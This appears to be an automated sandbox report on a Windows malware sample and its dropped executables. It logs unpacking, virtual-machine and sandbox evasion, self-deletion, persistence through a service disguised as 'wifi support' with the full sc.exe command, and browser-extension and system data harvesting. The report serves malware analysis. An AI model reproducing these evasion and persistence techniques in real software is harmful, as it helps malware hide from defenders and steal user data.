Source: C:\Users\user\AppData\Local\Temp\B72.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\49B.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: GzsKHwvBmG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\jenilol\fovogoranupiho_bakawol.pdb source: 49B.exe, 00000016.00000000.379502772.0000000000458000.00000002.00020000.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.290694665.000000000F820000.00000002.00000001.sdmp
Source:	Binary string: C:\docixeyola\pohisewabotay\temeboro jixixag\fodoxiwu.pdb source: GzsKHwvBmG.exe, 00000001.00000000.248132993.0000000000412000.00000002.00020000.sdmp, hhiwwui, 00000011.00000002.358441606.0000000000412000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\ConfigurationStringConstants.pdb source: B72.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.290694665.000000000F820000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Unpacked PE file: 3.2.GzsKHwvBmG.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hhiwwui	Unpacked PE file: 18.2.hhiwwui.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Unpacked PE file: 25.2.E61.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 1_2_02DE27FF push ebx; iretd	1_2_02DE2800
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 1_2_02DE3384 pushfd ; retf	1_2_02DE3385
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 1_2_02DE35BC push ss; retf	1_2_02DE35BD
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_0040205F push ebx; iretd	3_2_00402060
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_00402BE4 pushfd ; retf	3_2_00402BE5
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_1_0040205F push ebx; iretd	3_1_00402060
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_1_00402E1C push ss; retf	3_1_00402E1D
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_1_00402BE4 pushfd ; retf	3_1_00402BE5
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 17_2_02F3AA94 push ss; retf	17_2_02F3AA95
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_0040205F push ebx; iretd	18_2_00402060
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_00402BE4 pushfd ; retf	18_2_00402BE5
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_1_0040205F push ebx; iretd	18_1_00402060
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_1_00402E1C push ss; retf	18_1_00402E1D
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_1_00402BE4 pushfd ; retf	18_1_00402BE5
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_004000BB push edx; retf	22_2_004000C2
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0046684F push eax; ret	22_2_00466885
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00466830 push eax; ret	22_2_0046684E
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_004668A0 push eax; ret	22_2_00466885
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00468249 push ecx; ret	25_2_0046825C
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0046E2C5 push ecx; ret	25_2_0046E2D8

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_00412190 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,

25_2_00412190

Source: B72.exe.6.dr

Static PE information: 0xF3E8DBF0 [Thu Sep 3 13:09:04 2099 UTC]

Source: 1AB6.exe.6.dr	Static PE information: section name:
Source: 1AB6.exe.6.dr	Static PE information: section name: \|
Source: 1AB6.exe.6.dr	Static PE information: section name: .themida
Source: 1AB6.exe.6.dr	Static PE information: section name: .boot
Source: 2612.exe.6.dr	Static PE information: section name:
Source: 2612.exe.6.dr	Static PE information: section name: \|
Source: 2612.exe.6.dr	Static PE information: section name: .themida
Source: 2612.exe.6.dr	Static PE information: section name: .boot
Source: sqlite3.dll.22.dr	Static PE information: section name: /4
Source: sqlite3.dll.22.dr	Static PE information: section name: /19
Source: sqlite3.dll.22.dr	Static PE information: section name: /31
Source: sqlite3.dll.22.dr	Static PE information: section name: /45
Source: sqlite3.dll.22.dr	Static PE information: section name: /57
Source: sqlite3.dll.22.dr	Static PE information: section name: /70
Source: sqlite3.dll.22.dr	Static PE information: section name: /81
Source: sqlite3.dll.22.dr	Static PE information: section name: /92

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: 1AB6.exe.6.dr	Static PE information: real checksum: 0x31df22 should be: 0x31981b
Source: B72.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x91ec6
Source: 2612.exe.6.dr	Static PE information: real checksum: 0x29d953 should be: 0x29924c

Source: initial sample	Static PE information: section name: .text entropy: 7.58442645787
Source: initial sample	Static PE information: section name: .text entropy: 7.97186691386
Source: initial sample	Static PE information: section name: .text entropy: 7.74005815224
Source: initial sample	Static PE information: section name: \| entropy: 7.99829629323
Source: initial sample	Static PE information: section name: \| entropy: 7.99682280491
Source: initial sample	Static PE information: section name: .text entropy: 7.70098761686
Source: initial sample	Static PE information: section name: .text entropy: 7.58442645787

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hhiwwui

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\40A0.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B72.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1EB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\49B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\B72.exe	File created: C:\Users\user\AppData\Local\Temp\876504d2-be03-42d9-b2f9-6ed891d3a9d2\ .dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hhiwwui	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E61.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\1AB6.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2612.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\40A0.exe

Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create nkrwinfc binPath= 'C:\Windows\SysWOW64\nkrwinfc\bwlvafxv.exe /d\'C:\Users\user\AppData\Local\Temp\40A0.exe\'' type= own start= auto DisplayName= 'wifi support'

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 2080
Source: unknown	Network traffic detected: HTTP traffic on port 2080 -> 49720

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\gzskhwvbmg.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\hhiwwui:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_004626E9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

25_2_004626E9

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1EB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1EB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1EB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: GzsKHwvBmG.exe, 00000003.00000002.308391136.000000000073B000.00000004.00000020.sdmp

Binary or memory string: ASWHOOKL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\B72.exe

RDTSC instruction interceptor: First address: 00007FFA77D61F0F second address: 00007FFA77D61F90 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov dword ptr [esp+28h], eax 0x0000000e dec eax 0x0000000f mov eax, dword ptr [esp+30h] 0x00000013 dec eax 0x00000014 mov ecx, dword ptr [esp+28h] 0x00000018 dec eax 0x00000019 sub ecx, eax 0x0000001b dec eax 0x0000001c mov eax, ecx 0x0000001e dec eax 0x0000001f add esp, 48h 0x00000022 ret 0x00000023 dec eax 0x00000024 mov dword ptr [00010326h], eax 0x0000002a mov dword ptr [esp+28h], 00000000h 0x00000032 jmp 00007FBFF4CBEB3Ch 0x00000034 mov eax, dword ptr [esp+50h] 0x00000038 cmp dword ptr [esp+28h], eax 0x0000003c jnl 00007FBFF4CBEB74h 0x0000003e rdtsc

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 360	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1488	Thread sleep count: 599 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4912	Thread sleep count: 245 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4928	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4928	Thread sleep time: -42100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4344	Thread sleep count: 329 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2940	Thread sleep count: 381 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2940	Thread sleep time: -38100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4592	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe TID: 2908	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe TID: 5024	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe TID: 5024	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B72.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\B72.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_0045F961 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0045FA8Ah

25_2_0045F961

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 599	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 381	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Window / User API: threadDelayed 776	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	Window / User API: threadDelayed 1025	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B72.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_00434D4F __EH_prolog,GetLogicalDriveStringsA,

22_2_00434D4F

Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: explorer.exe, 00000006.00000000.286214763.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.266584859.0000000001218000.00000004.00000020.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.298106188.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.285442042.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000005.00000002.601309147.000002A5C1229000.00000004.00000001.sdmp, 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000008.00000002.558372050.0000028284202000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000006.00000000.295502231.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.287054376.0000000008BB0000.00000004.00000001.sdmp	Binary or memory string: 2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAJ6
Source: explorer.exe, 00000006.00000000.286449682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000006.00000000.274969789.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.285442042.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.285442042.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000006.00000000.286449682.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: svchost.exe, 00000008.00000002.558582675.000002828423E000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.602651181.000001900CC29000.00000004.00000001.sdmp, B72.exe, 00000017.00000002.607237848.0000000001417000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000006.00000000.285442042.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_004368D6 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,

22_2_004368D6

